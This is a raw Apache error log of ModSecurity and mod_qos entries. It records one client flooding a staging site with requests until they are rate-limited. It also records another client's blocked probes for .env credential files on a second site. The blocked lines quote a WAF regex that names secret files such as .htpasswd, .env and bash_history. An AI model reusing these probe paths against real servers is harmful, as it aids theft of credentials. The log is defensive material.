[Tue May 26 19:54:11.318774 2026] [security2:error] [pid 86490:tid 86744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2fgAAAQE"]
[Tue May 26 19:54:11.320426 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2kAAAAP8"]
[Tue May 26 19:54:11.327737 2026] [security2:error] [pid 86490:tid 86702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2fAAAANc"]
[Tue May 26 19:54:11.334395 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2gAAAAPc"]
[Tue May 26 19:54:11.336393 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2YQAAAPY"]
[Tue May 26 19:54:11.340092 2026] [security2:error] [pid 86490:tid 86681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2hQAAAMI"]
[Tue May 26 19:54:11.346838 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCUqK9k_ZUB2Vp25G3QAAAdQ"]
[Tue May 26 19:54:11.352936 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G6QAAAfw"]
[Tue May 26 19:54:11.362321 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2jQAAANw"]
[Tue May 26 19:54:11.364759 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNzwAAADM"]
[Tue May 26 19:54:11.364760 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2jwAAANo"]
[Tue May 26 19:54:11.366407 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszN0AAAADg"]
[Tue May 26 19:54:11.372806 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G7QAAAgU"]
[Tue May 26 19:54:11.373260 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2gwAAAK8"]
[Tue May 26 19:54:11.374909 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCUqK9k_ZUB2Vp25G4wAAAZM"]
[Tue May 26 19:54:11.381048 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszN1QAAAHo"]
[Tue May 26 19:54:11.395990 2026] [security2:error] [pid 86490:tid 86701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K2wAAAANY"]
[Tue May 26 19:54:11.398940 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G7AAAAcg"]
[Tue May 26 19:54:11.402580 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G7wAAAdY"]
[Tue May 26 19:54:11.421769 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G7gAAAfk"]
[Tue May 26 19:54:11.425850 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K2zwAAAPs"]
[Tue May 26 19:54:11.450378 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszN5QAAABI"]
[Tue May 26 19:54:11.453978 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25HAQAAAZ4"]
[Tue May 26 19:54:11.457948 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K2zAAAAKw"]
[Tue May 26 19:54:11.592221 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3OQAAAJg
[Tue May 26 19:54:11.593913 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3OgAAAQI
[Tue May 26 19:54:11.595721 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3PAAAAJo
[Tue May 26 19:54:11.595889 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3PgAAAPQ
[Tue May 26 19:54:11.596819 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3PwAAAL0
[Tue May 26 19:54:11.597329 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3QAAAALY
[Tue May 26 19:54:11.600294 2026] [qos:error] [pid 86490:tid 86707] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtC1ZMwN0DpLVWo6K3QQAAANw
[Tue May 26 19:54:11.603338 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3QwAAAME
[Tue May 26 19:54:11.605607 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszONwAAAGM
[Tue May 26 19:54:11.615575 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3RAAAANo
[Tue May 26 19:54:11.637043 2026] [security2:error] [pid 86490:tid 86699] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rEaCt/.EnV"] [unique_id "ahWtC1ZMwN0DpLVWo6K3RgAAANQ"]
[Tue May 26 19:54:11.747287 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3SwAAAK8
[Tue May 26 19:54:11.748492 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3TAAAANU
[Tue May 26 19:54:11.749363 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3TQAAAP4
[Tue May 26 19:54:11.749618 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3TgAAALc
[Tue May 26 19:54:11.749725 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3UAAAAJQ
[Tue May 26 19:54:11.750775 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3TwAAAPA
[Tue May 26 19:54:11.751200 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3UQAAAJI
[Tue May 26 19:54:11.755442 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3UgAAAN8
[Tue May 26 19:54:11.760595 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOOAAAADA
[Tue May 26 19:54:11.768705 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3UwAAAO4
[Tue May 26 19:54:11.899824 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3VQAAANM
[Tue May 26 19:54:11.900902 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3VgAAAPM
[Tue May 26 19:54:11.902213 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3WAAAALo
[Tue May 26 19:54:11.902460 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3VwAAAI8
[Tue May 26 19:54:11.904773 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3WgAAAP0
[Tue May 26 19:54:11.905599 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3WwAAAIs
[Tue May 26 19:54:11.905836 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3WQAAAMQ
[Tue May 26 19:54:11.907153 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3XAAAAKo
[Tue May 26 19:54:11.913012 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOOQAAAG0
[Tue May 26 19:54:11.922263 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3XQAAALE
[Tue May 26 19:54:11.959021 2026] [security2:error] [pid 86490:tid 86732] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/FE/huey/.env"] [unique_id "ahWtC1ZMwN0DpLVWo6K3XgAAAPU"]
[Tue May 26 19:54:12.049552 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3YgAAANE
[Tue May 26 19:54:12.054298 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3YwAAAOQ
[Tue May 26 19:54:12.055128 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3ZAAAAKw
[Tue May 26 19:54:12.055870 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3ZQAAAPg
[Tue May 26 19:54:12.058769 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3ZgAAAKI
[Tue May 26 19:54:12.058848 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3ZwAAAIY
[Tue May 26 19:54:12.059435 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3aAAAAKI
[Tue May 26 19:54:12.060240 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3aQAAAN0
[Tue May 26 19:54:12.065490 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDGDRMqfxdEDkoszOOgAAAEg
[Tue May 26 19:54:12.075449 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3agAAAJg
[Tue May 26 19:54:12.124515 2026] [security2:error] [pid 93868:tid 94302] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HHwAAAbs"]
[Tue May 26 19:54:12.199833 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3bwAAAJ8
[Tue May 26 19:54:12.206160 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3cAAAANQ
[Tue May 26 19:54:12.206604 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3cQAAAK8
[Tue May 26 19:54:12.209299 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3cgAAANU
[Tue May 26 19:54:12.213001 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3cwAAAP4
[Tue May 26 19:54:12.213716 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3dQAAAJQ
[Tue May 26 19:54:12.213719 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3dAAAALc
[Tue May 26 19:54:12.218544 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDGDRMqfxdEDkoszOPAAAACw
[Tue May 26 19:54:12.228373 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3dgAAAJI
[Tue May 26 19:54:12.232313 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3dwAAAN8
[Tue May 26 19:54:12.280255 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszN4wAAAAU"]
[Tue May 26 19:54:12.280518 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K2zQAAAMA"]
[Tue May 26 19:54:12.281823 2026] [security2:error] [pid 86490:tid 86733] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fixtures/kitchensink/.env"] [unique_id "ahWtDFZMwN0DpLVWo6K3fAAAAPY"]
[Tue May 26 19:54:12.287360 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszN9wAAADw"]
[Tue May 26 19:54:12.296936 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszN9QAAACM"]
[Tue May 26 19:54:12.297729 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G_AAAAgo"]
[Tue May 26 19:54:12.299835 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K29AAAAMc"]
[Tue May 26 19:54:12.304444 2026] [security2:error] [pid 86490:tid 86706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K2zgAAANs"]
[Tue May 26 19:54:12.306048 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K20AAAAL4"]
[Tue May 26 19:54:12.314282 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K27wAAAOg"]
